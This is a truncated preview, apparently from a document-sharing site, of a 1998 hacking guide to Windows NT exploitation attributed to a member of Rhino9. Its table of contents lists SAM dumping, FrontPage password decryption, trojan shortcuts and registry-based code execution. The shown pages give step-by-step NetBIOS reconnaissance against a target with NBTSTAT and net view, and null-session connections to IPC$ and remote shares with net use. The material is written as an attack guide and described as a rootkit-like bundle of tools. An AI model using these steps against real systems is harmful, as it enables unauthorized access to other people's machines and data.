{[ promptMessage ]}

Bookmark it

{[ promptMessage ]}

ntexploits - Windows NT Deconstruction Tatics Step by Step...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
Windows NT Deconstruction Tatics Step by Step NT Explotation Techniques by vacuum of Rhino9 & Technotronic [email protected] Revision 5 10/01/98 Changes in Revision 5: Refined some NET.EXE examples. Included brief discussion of NetBus. Samba rdisk /s information. Made this .zip more like a unix rootkit by included all the mentioned tools. Cleaned up the overall layout. I. Initial Access Strategy 1.)NetBIOS Shares Using Microsoft Executables a. NET.EXE 's other uses 2.)NAT The NetBIOS Auditing Tool II.FrontPage Exploitation 1.)FrontPage password decryption on unix servers with frontpage extensions. III. Registry Vulnerabilities 1.) rdisk /s to dump the SAM (Security Account Manager) 2.) gaining access to the regisry with the AT.EXE command (local) 3.) REGEDT32.EXE and REGEDIT.EXE 4.) REGINI.EXE and REGDMP.EXE remote registry editing tools 5.) Using the Registry to Execute Malicious Code IV. Trojan .lnk (shortcuts) 1.)Security hole within winnt\profiles and login scripts V. Workarounds for common sytsem policy restrictions VI. PWDUMP Example Included Files: NTExploits.txt this document samproof.txt example of the sam hive from the registry notepad.reg Example .reg file that starts up notepad.exe upon login. Could be a service.pwd Service.pwd frontpage password example. NetBIOS Shares Using the standard Microsoft Executables C:\>NBTSTAT -A C:\>NBTSTAT -a www.target.com NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D After a NetBIOS share is found, it can be added to the LMHOSTS file.
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full Document Right Arrow Icon
Computername <03> UNIQUE Registered by the messenger service. This is the computer to be added to the LMHOSTS file which is not necessary to NAT.EXE but is necessary if you would like to view the re computer in Network Neighborhood. Example of LMHOSTS file: student1 target2 Now you can use the find computer options within NT or 95 to browse the shares. An alternative option would be to use the very powerful NET.EXE C:\>net view C:\>net view \\student1 Shared resources at Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ shares are hidden and are not shown. To connect to the ipc$ using a null session: C:\net use \\\ipc$ "" /user:"" The command completed successfully. To connect to a normal share: C:\net use x: \\\test The command completed successfully. Now the command prompt or the NT Explorer can be used to access the remote drive X C:\net use New connections will be remembered.
Background image of page 2
Image of page 3
This is the end of the preview. Sign up to access the rest of the document.

{[ snackBarMessage ]}